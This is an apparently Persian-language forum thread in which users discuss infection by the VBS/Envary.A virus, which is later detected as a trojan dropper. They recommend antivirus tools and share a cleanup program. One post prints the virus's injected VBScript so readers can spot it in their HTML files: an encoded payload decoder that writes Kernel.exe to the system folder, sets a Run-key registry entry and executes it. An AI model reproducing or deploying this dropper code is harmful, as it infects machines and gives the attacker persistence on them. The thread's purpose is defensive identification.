سلام دوستان :blush:
ویروس سیستم منو وخورد !!!:whoow:
اسم ویروس : VBS/Envary.A virus
این ویروس روی فایل های htm قرار ميگیره و با اجرای اینترنت اکسپلورر اجرا میشه و...

چون شکم گرفته بود که ویروس دارم
Nod32 كه محسن خان قرار داده بود رو دانلود کردم
دیدم بههههههههه 59000 فایل ویروسی :whoow: :cry: :blink: :blink: :blink:
همه هم فایل های فارکس ...
مشکلی که الان دارم اینه که Nod توانايي پاک سازی فایل ها رو نداره یا پاک میکنه یا تغییر نام !!
دوستان اگر نرم افزاری میشناسن که این فایل ها رو تمیز کنه و پاک نکننه لطفا کمک کنن:rolleyes:

کاری که میخوام بکنم نوشتن یه برنامه برای پاک کردن اون تیکه از کد مخرب ویروس هست ! البته اگر راه دیگری نباشه
ممنون
موفق باشید :advise:

Nod رو اپدیت کردم
اسم ویروسه عوض شد
و ویروس به تروجان تغییر نام یافت !!!!!!!!!!!!!!!!!!!
VBS/TrojanDropper.Small.W trojan
!!!
كمكككككككككككككك

salam .
kaspersky beriz tamameshono az bein mibare..!!

سلام

این یکی را امتحان بفرمایید . امیدوارم بر طرف شود :

[Only registered and activated users can see links]


موفق باشید

هاااااااااااااا وکشتمش !
از این آنتی ویروس ها چیزی ...
خودم آنتی شو ونوشتم !
یکی از دوستان در مورد یه نفری گفت به من ویروس داده ...
نگاه کردم دیدم همینه !
دوستان فایل های HTML شون رو چک کنن
آخرش قطعه کدی ناشناسی یا کدی که در همه فایل های HTML داشته باشن ..
مثال !

<script language=vbscript>
on error resume next
fileexe1="07709014400000300000000000400000000025525500000018 40000000000000000000000640000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000018400000000001403118 60140001800092050331840010762050330841041051150321 12114111103114097109032099097110110111116032098101 03211411711003210511003206807908303210911110010104 60130130100360000000000000000000002120361420281440 69224079144069224079144069224079030090243079135069 22407910810124207914706922407908210509910414406922 40790000000000000000000000000000000000000000000000 00080069000000076001003000081115047069000000000000 00000000000022400001500101100100501200000200000000 00300060000000000000000070170000000000160000000000 32000000000000064000000016000000000002000000004000 00000000400000000000400000000000000000000000008000 60000000040000001390390000000020000000000000000160 00000016000000000000016000000016000000000000000000 01600000000000000000000000000000000006803200000010 00000000000000000000000000000000000000000000000000 00000000000000000000000203407111103211611103210912 10321150971051160580321041161161120580470471031051 14108115101120046119101098115046105111047112105099 11611711410104610411610903401301011109810607710111 51150971031010460831011101000130101090971051080970 61109097105108109046114101097100108105110101013010 11910111010001301010211511104606711410109711610108 41011201160701051081010401151211150320380320340920 83121115116101109118046100108108034041046119114105 11610103203411110210203401301010111010003211511709 8013010"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
kr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Microsoft Windows"))
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or kr<>ucase(sys & "\KERNEL.EXE") then
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")

شمام بله!
آنتی ویروس فقط کاسپر اسکای

منم این ویروس را گرفتم
همه آنتی ویروس ها هم فقط میخوان فایل را حذف کنند
چکار کنم ؟ :cry:

منم این ویروس را گرفتم
همه آنتی ویروس ها هم فقط میخوان فایل را حذف کنند
چکار کنم ؟ :cry:

سلام
شما اول با کاسپراسکی شاخه ویندوز رو اسکن کنید و ...
بعد این برنامه رو باز کنید
درایو رو انتخاب کنید و روی سرچ کلیک کنید صبر کنید فایل ها رو لیست که کرد بعد روی Clean کلیک کنید
(در قسمت Path ) هم میتونید مسیر جستجو رو بدید
...

[Only registered and activated users can see links]

:rolleyes:

امکان داره برنامه هنگ کنه موردی نداره داره کارشو میکنه !!:blink:
دوستانی هم که شک دارن این وروس رو دارن روی گذینه Find Virus کلیک کنن اگه داشته باشن لیست میکنه :happy:
موفق و پیروز باشید

مجموعه ای از ضد ویروسهای قدرتمند

[Only registered and activated users can see links]

در ادرس نوشته شده -برای دانلود - بر روی ادامه مطلب کلیک کنید...

سلام
شما اول با کاسپراسکی شاخه ویندوز رو اسکن کنید و ...
بعد این برنامه رو باز کنید
درایو رو انتخاب کنید و روی سرچ کلیک کنید صبر کنید فایل ها رو لیست که کرد بعد روی Clean کلیک کنید
(در قسمت Path ) هم میتونید مسیر جستجو رو بدید
...

[Only registered and activated users can see links]

:rolleyes:

امکان داره برنامه هنگ کنه موردی نداره داره کارشو میکنه !!:blink:
دوستانی هم که شک دارن این وروس رو دارن روی گذینه Find Virus کلیک کنن اگه داشته باشن لیست میکنه :happy:
موفق و پیروز باشید

واقعا ممنون

اقا من هرکاری میکنم پاک نمیشه
کمکی بکنید

یکی از فایل های ویروسی رو یه جا آپلود کنید لینک بدید !
با آنتی ویروس کاسپراسکی درایو ویندوز رو اسکن کنید ویروس .. رو ..

سلام
شما اول با کاسپراسکی شاخه ویندوز رو اسکن کنید و ...
بعد این برنامه رو باز کنید
درایو رو انتخاب کنید و روی سرچ کلیک کنید صبر کنید فایل ها رو لیست که کرد بعد روی Clean کلیک کنید
(در قسمت Path ) هم میتونید مسیر جستجو رو بدید
...

[Only registered and activated users can see links]

:rolleyes:

امکان داره برنامه هنگ کنه موردی نداره داره کارشو میکنه !!:blink:
دوستانی هم که شک دارن این وروس رو دارن روی گذینه Find Virus کلیک کنن اگه داشته باشن لیست میکنه :happy:
موفق و پیروز باشید

برنامه از سرور پاک شده
اگه میشه دوباره آپ کنیدش
ممنون

برنامه از سرور پاک شده
اگه میشه دوباره آپ کنیدش
ممنون

آقا پیام حدود یه سال دیر رسیدید ;)
به تاریخ آخرین پست قبل از خود نگاه کنید.
ارادت